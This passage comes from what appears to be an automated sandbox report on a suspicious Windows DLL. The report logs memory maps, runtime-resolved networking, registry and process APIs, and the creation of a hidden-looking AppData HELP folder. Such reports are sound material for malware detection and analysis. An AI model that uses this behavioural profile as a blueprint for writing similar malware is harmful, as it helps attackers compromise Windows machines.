| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:26 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 95893 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #31: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #31 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllUnregisterServer /fn_args="Install" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:33, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbc4 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BC8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00260000 | 0x002c6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000300000 | 0x00300000 | 0x003c7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x004d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x010dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000010e0000 | 0x010e0000 | 0x0118ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x013effff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:26 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 95971 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #32: gorctexxzx.exe
125
0
| Information | Value |
|---|---|
| ID | #32 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=Entry /fn_args="Install" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:33, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbd0 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BD4
0x
DD8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0015ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00270000 | 0x002d6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x003d7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x004e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x010effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0138ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0133ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001380000 | 0x01380000 | 0x0138ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001480000 | 0x01480000 | 0x0157ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
